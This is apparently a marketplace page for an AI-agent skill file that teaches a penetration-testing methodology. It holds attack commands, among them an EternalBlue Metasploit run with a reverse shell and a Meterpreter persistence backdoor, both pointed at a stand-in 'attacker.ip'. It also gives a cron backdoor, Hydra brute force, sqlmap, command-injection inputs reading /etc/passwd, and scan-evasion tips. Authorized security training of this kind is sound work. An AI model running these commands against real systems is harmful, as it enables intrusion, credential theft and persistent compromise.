How do I install Ethical Hacking Methodology?

Install Ethical Hacking Methodology with a single command: npx mdskills install sickn33/ethical-hacking-methodology. This downloads the skill files into your project and your AI agent picks them up automatically.

What platforms support Ethical Hacking Methodology?

Ethical Hacking Methodology works with Claude Code, Claude Desktop, Cursor, Vscode Copilot, Windsurf, Continue Dev, Codex, Gemini Cli, Amp, Roo Code, Goose, Opencode, Trae, Qodo, Command Code. Skills use the open SKILL.md format which is compatible with any AI coding agent that reads markdown instructions.

← Back to skills

Ethical Hacking Methodology

Name: Ethical Hacking Methodology: AI Agent Skill
Rating: 7 (1 reviews)
Author: sickn33

Verified

SecurityIntermediate

This skill should be used when the user asks to "learn ethical hacking", "understand penetration testing lifecycle", "perform reconnaissance", "conduct security scanning", "exploit vulnerabilities", or "write penetration test reports". It provides comprehensive ethical hacking methodology and techniques.

by @sickn330Updated 2 weeks ago

Add this skill

npx mdskills install sickn33/ethical-hacking-methodology

Fork & Edit

Skill Advisor7.0

Comprehensive penetration testing guide with structured phases and actionable commands

+Provides detailed command examples for each testing phase
+Includes clear ethical guidelines and authorization requirements
+Covers complete pentest lifecycle from reconnaissance to reporting
-Lacks trigger conditions for when agent should execute specific phases
-Missing validation logic to prevent unauthorized testing execution

SKILL.md

Edit in Browser

1---
2name: Ethical Hacking Methodology
3description: This skill should be used when the user asks to "learn ethical hacking", "understand penetration testing lifecycle", "perform reconnaissance", "conduct security scanning", "exploit vulnerabilities", or "write penetration test reports". It provides comprehensive ethical hacking methodology and techniques.
4metadata:
5  author: zebbern
6  version: "1.1"
7---
8 
9# Ethical Hacking Methodology
10 
11## Purpose
12 
13Master the complete penetration testing lifecycle from reconnaissance through reporting. This skill covers the five stages of ethical hacking methodology, essential tools, attack techniques, and professional reporting for authorized security assessments.
14 
15## Prerequisites
16 
17### Required Environment
18- Kali Linux installed (persistent or live)
19- Network access to authorized targets
20- Written authorization from system owner
21 
22### Required Knowledge
23- Basic networking concepts
24- Linux command-line proficiency
25- Understanding of web technologies
26- Familiarity with security concepts
27 
28## Outputs and Deliverables
29 
301. **Reconnaissance Report** - Target information gathered
312. **Vulnerability Assessment** - Identified weaknesses
323. **Exploitation Evidence** - Proof of concept attacks
334. **Final Report** - Executive and technical findings
34 
35## Core Workflow
36 
37### Phase 1: Understanding Hacker Types
38 
39Classification of security professionals:
40 
41**White Hat Hackers (Ethical Hackers)**
42- Authorized security professionals
43- Conduct penetration testing with permission
44- Goal: Identify and fix vulnerabilities
45- Also known as: penetration testers, security consultants
46 
47**Black Hat Hackers (Malicious)**
48- Unauthorized system intrusions
49- Motivated by profit, revenge, or notoriety
50- Goal: Steal data, cause damage
51- Also known as: crackers, criminal hackers
52 
53**Grey Hat Hackers (Hybrid)**
54- May cross ethical boundaries
55- Not malicious but may break rules
56- Often disclose vulnerabilities publicly
57- Mixed motivations
58 
59**Other Classifications**
60- **Script Kiddies**: Use pre-made tools without understanding
61- **Hacktivists**: Politically or socially motivated
62- **Nation State**: Government-sponsored operatives
63- **Coders**: Develop tools and exploits
64 
65### Phase 2: Reconnaissance
66 
67Gather information without direct system interaction:
68 
69**Passive Reconnaissance**
70```bash
71# WHOIS lookup
72whois target.com
73 
74# DNS enumeration
75nslookup target.com
76dig target.com ANY
77dig target.com MX
78dig target.com NS
79 
80# Subdomain discovery
81dnsrecon -d target.com
82 
83# Email harvesting
84theHarvester -d target.com -b all
85```
86 
87**Google Hacking (OSINT)**
88```
89# Find exposed files
90site:target.com filetype:pdf
91site:target.com filetype:xls
92site:target.com filetype:doc
93 
94# Find login pages
95site:target.com inurl:login
96site:target.com inurl:admin
97 
98# Find directory listings
99site:target.com intitle:"index of"
100 
101# Find configuration files
102site:target.com filetype:config
103site:target.com filetype:env
104```
105 
106**Google Hacking Database Categories:**
107- Files containing passwords
108- Sensitive directories
109- Web server detection
110- Vulnerable servers
111- Error messages
112- Login portals
113 
114**Social Media Reconnaissance**
115- LinkedIn: Organizational charts, technologies used
116- Twitter: Company announcements, employee info
117- Facebook: Personal information, relationships
118- Job postings: Technology stack revelations
119 
120### Phase 3: Scanning
121 
122Active enumeration of target systems:
123 
124**Host Discovery**
125```bash
126# Ping sweep
127nmap -sn 192.168.1.0/24
128 
129# ARP scan (local network)
130arp-scan -l
131 
132# Discover live hosts
133nmap -sP 192.168.1.0/24
134```
135 
136**Port Scanning**
137```bash
138# TCP SYN scan (stealth)
139nmap -sS target.com
140 
141# Full TCP connect scan
142nmap -sT target.com
143 
144# UDP scan
145nmap -sU target.com
146 
147# All ports scan
148nmap -p- target.com
149 
150# Top 1000 ports with service detection
151nmap -sV target.com
152 
153# Aggressive scan (OS, version, scripts)
154nmap -A target.com
155```
156 
157**Service Enumeration**
158```bash
159# Specific service scripts
160nmap --script=http-enum target.com
161nmap --script=smb-enum-shares target.com
162nmap --script=ftp-anon target.com
163 
164# Vulnerability scanning
165nmap --script=vuln target.com
166```
167 
168**Common Port Reference**
169| Port | Service | Notes |
170|------|---------|-------|
171| 21 | FTP | File transfer |
172| 22 | SSH | Secure shell |
173| 23 | Telnet | Unencrypted remote |
174| 25 | SMTP | Email |
175| 53 | DNS | Name resolution |
176| 80 | HTTP | Web |
177| 443 | HTTPS | Secure web |
178| 445 | SMB | Windows shares |
179| 3306 | MySQL | Database |
180| 3389 | RDP | Remote desktop |
181 
182### Phase 4: Vulnerability Analysis
183 
184Identify exploitable weaknesses:
185 
186**Automated Scanning**
187```bash
188# Nikto web scanner
189nikto -h http://target.com
190 
191# OpenVAS (command line)
192omp -u admin -w password --xml="<get_tasks/>"
193 
194# Nessus (via API)
195nessuscli scan --target target.com
196```
197 
198**Web Application Testing (OWASP)**
199- SQL Injection
200- Cross-Site Scripting (XSS)
201- Broken Authentication
202- Security Misconfiguration
203- Sensitive Data Exposure
204- XML External Entities (XXE)
205- Broken Access Control
206- Insecure Deserialization
207- Using Components with Known Vulnerabilities
208- Insufficient Logging & Monitoring
209 
210**Manual Techniques**
211```bash
212# Directory brute forcing
213gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt
214 
215# Subdomain enumeration
216gobuster dns -d target.com -w /usr/share/wordlists/subdomains.txt
217 
218# Web technology fingerprinting
219whatweb target.com
220```
221 
222### Phase 5: Exploitation
223 
224Actively exploit discovered vulnerabilities:
225 
226**Metasploit Framework**
227```bash
228# Start Metasploit
229msfconsole
230 
231# Search for exploits
232msf> search type:exploit name:smb
233 
234# Use specific exploit
235msf> use exploit/windows/smb/ms17_010_eternalblue
236 
237# Set target
238msf> set RHOSTS target.com
239 
240# Set payload
241msf> set PAYLOAD windows/meterpreter/reverse_tcp
242msf> set LHOST attacker.ip
243 
244# Execute
245msf> exploit
246```
247 
248**Password Attacks**
249```bash
250# Hydra brute force
251hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://target.com
252hydra -L users.txt -P passwords.txt ftp://target.com
253 
254# John the Ripper
255john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
256```
257 
258**Web Exploitation**
259```bash
260# SQLMap for SQL injection
261sqlmap -u "http://target.com/page.php?id=1" --dbs
262sqlmap -u "http://target.com/page.php?id=1" -D database --tables
263 
264# XSS testing
265# Manual: <script>alert('XSS')</script>
266 
267# Command injection testing
268# ; ls -la
269# | cat /etc/passwd
270```
271 
272### Phase 6: Maintaining Access
273 
274Establish persistent access:
275 
276**Backdoors**
277```bash
278# Meterpreter persistence
279meterpreter> run persistence -X -i 30 -p 4444 -r attacker.ip
280 
281# SSH key persistence
282# Add attacker's public key to ~/.ssh/authorized_keys
283 
284# Cron job persistence
285echo "* * * * * /tmp/backdoor.sh" >> /etc/crontab
286```
287 
288**Privilege Escalation**
289```bash
290# Linux enumeration
291linpeas.sh
292linux-exploit-suggester.sh
293 
294# Windows enumeration
295winpeas.exe
296windows-exploit-suggester.py
297 
298# Check SUID binaries (Linux)
299find / -perm -4000 2>/dev/null
300 
301# Check sudo permissions
302sudo -l
303```
304 
305**Covering Tracks (Ethical Context)**
306- Document all actions taken
307- Maintain logs for reporting
308- Avoid unnecessary system changes
309- Clean up test files and backdoors
310 
311### Phase 7: Reporting
312 
313Document findings professionally:
314 
315**Report Structure**
3161. **Executive Summary**
317   - High-level findings
318   - Business impact
319   - Risk ratings
320   - Remediation priorities
321 
3222. **Technical Findings**
323   - Vulnerability details
324   - Proof of concept
325   - Screenshots/evidence
326   - Affected systems
327 
3283. **Risk Ratings**
329   - Critical: Immediate action required
330   - High: Address within 24-48 hours
331   - Medium: Address within 1 week
332   - Low: Address within 1 month
333   - Informational: Best practice recommendations
334 
3354. **Remediation Recommendations**
336   - Specific fixes for each finding
337   - Short-term mitigations
338   - Long-term solutions
339   - Resource requirements
340 
3415. **Appendices**
342   - Detailed scan outputs
343   - Tool configurations
344   - Testing timeline
345   - Scope and methodology
346 
347### Phase 8: Common Attack Types
348 
349**Phishing**
350- Email-based credential theft
351- Fake login pages
352- Malicious attachments
353- Social engineering component
354 
355**Malware Types**
356- **Virus**: Self-replicating, needs host file
357- **Worm**: Self-propagating across networks
358- **Trojan**: Disguised as legitimate software
359- **Ransomware**: Encrypts files for ransom
360- **Rootkit**: Hidden system-level access
361- **Spyware**: Monitors user activity
362 
363**Network Attacks**
364- Man-in-the-Middle (MITM)
365- ARP Spoofing
366- DNS Poisoning
367- DDoS (Distributed Denial of Service)
368 
369### Phase 9: Kali Linux Setup
370 
371Install penetration testing platform:
372 
373**Hard Disk Installation**
3741. Download ISO from kali.org
3752. Boot from installation media
3763. Select "Graphical Install"
3774. Configure language, location, keyboard
3785. Set hostname and root password
3796. Partition disk (Guided - use entire disk)
3807. Install GRUB bootloader
3818. Reboot and login
382 
383**Live USB (Persistent)**
384```bash
385# Create bootable USB
386dd if=kali-linux.iso of=/dev/sdb bs=512k status=progress
387 
388# Create persistence partition
389gparted /dev/sdb
390# Add ext4 partition labeled "persistence"
391 
392# Configure persistence
393mkdir /mnt/usb
394mount /dev/sdb2 /mnt/usb
395echo "/ union" > /mnt/usb/persistence.conf
396umount /mnt/usb
397```
398 
399### Phase 10: Ethical Guidelines
400 
401**Legal Requirements**
402- Obtain written authorization
403- Define scope clearly
404- Document all testing activities
405- Report all findings to client
406- Maintain confidentiality
407 
408**Professional Conduct**
409- Work ethically with integrity
410- Respect privacy of data accessed
411- Avoid unnecessary system damage
412- Execute planned tests only
413- Never use findings for personal gain
414 
415## Quick Reference
416 
417### Penetration Testing Lifecycle
418 
419| Stage | Purpose | Key Tools |
420|-------|---------|-----------|
421| Reconnaissance | Gather information | theHarvester, WHOIS, Google |
422| Scanning | Enumerate targets | Nmap, Nikto, Gobuster |
423| Exploitation | Gain access | Metasploit, SQLMap, Hydra |
424| Maintaining Access | Persistence | Meterpreter, SSH keys |
425| Reporting | Document findings | Report templates |
426 
427### Essential Commands
428 
429| Command | Purpose |
430|---------|---------|
431| `nmap -sV target` | Port and service scan |
432| `nikto -h target` | Web vulnerability scan |
433| `msfconsole` | Start Metasploit |
434| `hydra -l user -P list ssh://target` | SSH brute force |
435| `sqlmap -u "url?id=1" --dbs` | SQL injection |
436 
437## Constraints and Limitations
438 
439### Authorization Required
440- Never test without written permission
441- Stay within defined scope
442- Report unauthorized access attempts
443 
444### Professional Standards
445- Follow rules of engagement
446- Maintain client confidentiality
447- Document methodology used
448- Provide actionable recommendations
449 
450## Troubleshooting
451 
452### Scans Blocked
453 
454**Solutions:**
4551. Use slower scan rates
4562. Try different scanning techniques
4573. Use proxy or VPN
4584. Fragment packets
459 
460### Exploits Failing
461 
462**Solutions:**
4631. Verify target vulnerability exists
4642. Check payload compatibility
4653. Adjust exploit parameters
4664. Try alternative exploits
467

Full transparency — inspect the skill content before installing.